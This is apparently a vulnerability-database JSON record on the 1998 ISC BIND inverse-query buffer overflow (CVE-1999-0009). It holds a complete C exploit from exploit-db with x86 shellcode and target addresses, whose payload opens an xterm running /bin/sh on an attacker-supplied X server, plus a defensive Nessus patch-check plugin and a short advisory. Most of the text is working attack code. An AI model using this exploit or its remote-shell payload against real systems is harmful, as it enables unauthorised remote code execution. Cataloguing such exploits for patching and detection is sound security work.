break;\r\n\r\n xlen += i;\r\n if(!(--ti)) continue;\r\n }\r\n\r\n\r\n if(FD_ISSET(sock,&wr))\r\n {\r\n if(write(sock,xbuf,xlen)!=xlen)\r\n {\r\n (void)perror(\"error: write\");\r\n exit(-1);\r\n }\r\n\r\n xlen = 0;\r\n if(!(--ti)) continue;\r\n }\r\n\r\n if(FD_ISSET(sock,&rd))\r\n {\r\n if((i=read(sock,(ybuf+ylen),(sizeof(ybuf)-ylen)))==(-1))\r\n {\r\n (void)perror(\"error: read\");\r\n exit(-1);\r\n }\r\n else if(i==0)\r\n break;\r\n\r\n ylen += i;\r\n if(!(--ti)) continue;\r\n }\r\n\r\n if(FD_ISSET(fileno(stdout),&wr))\r\n {\r\n if(write(fileno(stdout),ybuf,ylen)!=ylen)\r\n {\r\n (void)perror(\"error: write\");\r\n exit(-1);\r\n }\r\n\r\n ylen = 0;\r\n if(!(--ti)) continue;\r\n }\r\n }\r\n\r\n if(close(sock)==(-1))\r\n {\r\n (void)perror(\"error: close\");\r\n exit(-1);\r\n }\r\n\r\n exit(0);\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19111/"}, {"lastseen": "2016-02-02T11:06:44", "description": "BSDI BSD/OS 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX 5.4 4.11,IBM AIX 4.3,ISC BIND 8.1.1,NetBSD 1.3.1,RedHat Linux 5.0,SCO Open Desktop 3.0/Serv...", "published": "1998-04-08T00:00:00", "type": "exploitdb", "title": "Multiple OSes - BIND Buffer Overflow 2", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0009"], "modified": "1998-04-08T00:00:00", "id": "EDB-ID:19112", "href": "https://www.exploit-db.com/exploits/19112/", "sourceData": "source: http://www.securityfocus.com/bid/134/info\r\n \r\nA buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.\r\n \r\nExploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.\r\n\r\n/*\r\n * z, thnx.\r\n * ganked the xterm exec from adm, thnx.\r\n * have fun.\r\n * -prym\r\n */\r\n\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <arpa/nameser.h>\r\n#include <netdb.h>\r\n\r\n#define REMOTE\r\n#define DEFAULT_ANBUF_OFFSET 300\r\n#define DEFAULT_TARGET 0\r\n#define DEFAULT_OPTIMIZED 0\r\n#define DLEN_VAL 4\r\n#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))\r\n#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)\r\n#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)\r\n#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)\r\n#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)\r\n\r\nstruct target_type\r\n{\r\n char desc[40];\r\n int systype;\r\n unsigned long addr;\r\n unsigned long opt_addr;\r\n};\r\n\r\nstruct target_type target[] =\r\n{\r\n {\"x86 Linux 2.0.x named 4.9.5-P1\",0,0xbfffef8c,0xbfffefb4},\r\n {\"x86 Linux 2.0.x named 4.9.6-REL\",0,0xbffff188,0xbffff194},\r\n {\"x86 Linux 2.0.x named 8.1-REL\",0,0xbffff3f0,0xbffff44c},\r\n {\"x86 Linux 2.0.x named 8.1.1\",0,0xbffff404,0xbffff45c},\r\n {\"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1\",0,0,0xbfffeff8},\r\n {{0},0,0,0}\r\n};\r\n\r\nunsigned long resolve(char *host)\r\n{\r\n long i;\r\n struct hostent *he;\r\n\r\n if((i=inet_addr(host))<0)\r\n if((he=gethostbyname(host))==NULL)\r\n return(0);\r\n else\r\n return(*(unsigned long *)he->h_addr);\r\n\r\n return(i);\r\n}\r\n\r\nint send_packet(int fd, char *buff, int len)\r\n{\r\n char tmp[2], *ptr=tmp;\r\n\r\n PUTSHORT(len,ptr);\r\n if(write(fd,tmp,2)!=2)\r\n return(-1);\r\n\r\n if(write(fd,buff,len)!=len)\r\n return(-1);\r\n\r\n return(1);\r\n}\r\n\r\nint attack(int fd, struct in_addr us, struct target_type t,\r\n\t unsigned long offset, int optimized)\r\n{\r\n char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;\r\n HEADER *dnsh=(HEADER *)buff;\r\n unsigned long i;\r\n int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;\r\n\r\n memset(dnsh,0,sizeof(HEADER));\r\n dnsh->id = htons(31337);\r\n dnsh->opcode = IQUERY;\r\n dnsh->rd = 1;\r\n dnsh->ra = 1;\r\n dnsh->ancount = htons(1);\r\n ptr += sizeof(HEADER);\r\n len += sizeof(HEADER);\r\n\r\n *ptr = '\\0';\r\n ptr++;\r\n PUTSHORT(T_A,ptr);\r\n PUTSHORT(C_IN,ptr);\r\n PUTLONG(31337,ptr);\r\n dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;\r\n PUTSHORT(dlen,ptr);\r\n len += PRE_OF_DATALEN;\r\n\r\n memset(ptr,'X',(sizeof(buff)-(ptr-buff)));\r\n\r\n if(t.systype==0)\r\n {\r\n#ifdef REMOTE\r\n char c1[] =\r\n\t\"\\xeb\\x2f\\x5f\\xeb\\x4a\\x5e\\x89\\xfb\\x89\\x3e\\x89\\xf2\\xb0\\xfe\\xae\\x74\"\r\n\t\"\\x14\\x46\\x46\\x46\\x46\\x4f\\x31\\xc9\\x49\\xb0\\xff\\xf2\\xae\\x30\\xc0\\x4f\"\r\n\t\"\\xaa\\x89\\x3e\\xeb\\xe7\\x31\\xc0\\x89\\x06\\x89\\xd1\\x31\\xd2\\xb0\\x0b\\xcd\"\r\n\t\"\\x80\\xe8\\xcc\\xff\\xff\\xff\";\r\n char c2[] =\r\n\t\"/usr/bin/X11/xterm\\xff-display\\xff\";\r\n char c3[32];\r\n char c4[] =\r\n\t\"\\xfe\\xe8\\xb1\\xff\\xff\\xff\";\r\n\r\n snprintf(c3,sizeof(c3),\"%s:0\\xff-e\\xff/bin/sh\\xff\",inet_ntoa(us));\r\n\r\n c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);\r\n c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);\r\n\r\n i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);\r\n\r\n memset(ptr,0x90,i);\r\n memcpy((ptr+i),c1,strlen(c1));\r\n memcpy((ptr+i+strlen(c1)),c2,strlen(c2));\r\n memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));\r\n memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));\r\n#else\r\n char c0de[] =\r\n \"\\xeb\\x24\\x5e\\x8d\\x1e\\x89\\x5e\\x0b\\x33\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\"\r\n \"\\xb8\\x1b\\x56\\x34\\x12\\x35\\x10\\x56\\x34\\x12\\x8d\\x4e\\x0b\\x8b\\xd1\\xcd\"\r\n \"\\x80\\x33\\xc0\\x40\\xcd\\x80\\xe8\\xd7\\xff\\xff\\xff/tmp/hi\";\r\n int i = EVILSPACE-strlen(c0de);\r\n\r\n memset(ptr,0x90,i);\r\n memcpy((ptr+i),c0de,strlen(c0de));\r\n#endif\r\n }\r\n else\r\n return(0);\r\n\r\n if(!optimized)\r\n {\r\n memcpy((ptr+(dlen-16)),&al,sizeof(al));\r\n memcpy((ptr+(dlen-12)),&dl,sizeof(dl));\r\n }\r\n\r\n i = (optimized?t.opt_addr:t.addr)+offset;\r\n memcpy((ptr+(dlen-4)),&i,sizeof(i));\r\n len += dlen;\r\n\r\n return(send_packet(fd,buff,len));\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n unsigned long offset=DEFAULT_ANBUF_OFFSET;\r\n int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;\r\n struct sockaddr_in sa;\r\n struct in_addr xs;\r\n\r\n for(i=0;target[i].desc[0];i++);\r\n\r\n if(argc<3)\r\n {\r\n fprintf(stderr,\"\\ntarget types:\\n\");\r\n fprintf(stderr,\" %-2s : %-12s - %-12s - %s\\n\",\"tt\",\"anbuf\",\"opt anbuf\",\r\n\t \"description\");\r\n for(target_index=0;target_index<i;target_index++)\r\n\tfprintf(stderr,\" %-2d : 0x%-10x - 0x%-10x - %s\\n\",target_index,\r\n\t\t(unsigned int)target[target_index].addr,\r\n\t\t(unsigned int)target[target_index].opt_addr,\r\n\t\ttarget[target_index].desc);\r\n fprintf(stderr,\r\n\t \"\\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\\n\",\r\n\t argv[0]);\r\n exit(-1);\r\n }\r\n\r\n if((argc>3)&&((target_index=atoi(argv[3]))>=i))\r\n {\r\n fprintf(stderr,\"error: invalid target type %d\\n\",target_index);\r\n exit(-1);\r\n }\r\n\r\n if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))\r\n {\r\n fprintf(stderr,\"error: internal error\\n\");\r\n exit(-1);\r\n }\r\n\r\n if(argc>4)\r\n {\r\n optimized = atoi(argv[4]);\r\n if((optimized!=0)&&(optimized!=1))\r\n\t{\r\n\t fprintf(stderr,\"error: invalid optimization setting %d\\n\",optimized);\r\n\t exit(-1);\r\n\t}\r\n }\r\n\r\n if((optimized==0)&&(target[target_index].addr==0))\r\n optimized = 1;\r\n\r\n if((optimized==1)&&(target[target_index].opt_addr==0))\r\n optimized = 0;\r\n\r\n if(argc>5)\r\n offset = atoi(argv[5]);\r\n\r\n if(!(xs.s_addr=resolve(argv[2])))\r\n {\r\n fprintf(stderr,\"error: can not resolve: %s\\n\",argv[2]);\r\n exit(-1);\r\n }\r\n\r\n if(!(sa.sin_addr.s_addr=resolve(argv[1])))\r\n {\r\n fprintf(stderr,\"error: can not resolve: %s\\n\",argv[1]);\r\n exit(-1);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(53);\r\n\r\n if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))\r\n {\r\n perror(\"error: socket\");\r\n exit(-1);\r\n }\r\n\r\n if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))\r\n {\r\n perror(\"error: connect\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"target : %s\\n\",inet_ntoa(sa.sin_addr));\r\n printf(\"target type : %s\\n\",target[target_index].desc);\r\n printf(\"optimized named : %s\\n\",(optimized?\"YES\":\"NO\"));\r\n printf(\"anbuff addr : 0x%x\\n\",(unsigned int)\r\n\t (optimized?target[target_index].opt_addr:target[target_index].addr));\r\n printf(\"anbuff addr offset : %lu\\n\",offset);\r\n printf(\"xterm display dest : %s:0\\n\",inet_ntoa(xs));\r\n printf(\"exploiting . . .\\n\");\r\n\r\n switch(attack(sock,xs,target[target_index],offset,optimized))\r\n {\r\n case -1:\r\n perror(\"error: attack\");\r\n return(-1);\r\n break;\r\n\r\n case 0:\r\n fprintf(stderr,\"error: internal error\\n\");\r\n return(-1);\r\n break;\r\n }\r\n\r\n if(close(sock)!=0)\r\n {\r\n perror(\"error: close\");\r\n return(-1);\r\n }\r\n\r\n exit(0);\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19112/"}], "nessus": [{"lastseen": "2021-01-12T11:32:04", "description": "s700_800 11.00 Bind 4.9.7 components : \n\nSecurity vulnerability in the BIND executable.", "edition": 21, "published": "2005-02-16T00:00:00", "title": "HP-UX PHNE_12957 : s700_800 11.00 Bind 4.9.7 components", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0011", "CVE-1999-0010", "CVE-1999-0009"], "modified": "2005-02-16T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_12957.NASL", "href": "https://www.tenable.com/plugins/nessus/16871", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_12957. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16871);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-1999-0009\", \"CVE-1999-0010\", \"CVE-1999-0011\");\n script_xref(name:\"HP\", value:\"HPSBUX9808-083\");\n\n script_name(english:\"HP-UX PHNE_12957 : s700_800 11.00 Bind 4.9.7 components\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 Bind 4.9.7 components : \n\nSecurity vulnerability in the BIND executable.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_12957 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"1998/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_12957 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_12957\", \"PHNE_14618\", \"PHNE_20619\", \"PHNE_23274\", \"PHNE_28449\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"InternetSrvcs.INET-ENG-A-MAN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS-RUN\", version:\"B.11.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

ISC BIND &lt; 4.9.7 / 8.1.2 Inverse-Query Remote Overflow

Description

The remote BIND server, according to its version number, is vulnerable to an inverse query overflow which could allow an attacker to execute arbitrary code on the remote host.

ISC BIND < 4.9.7 / 8.1.2 Inverse-Query Remote Overflow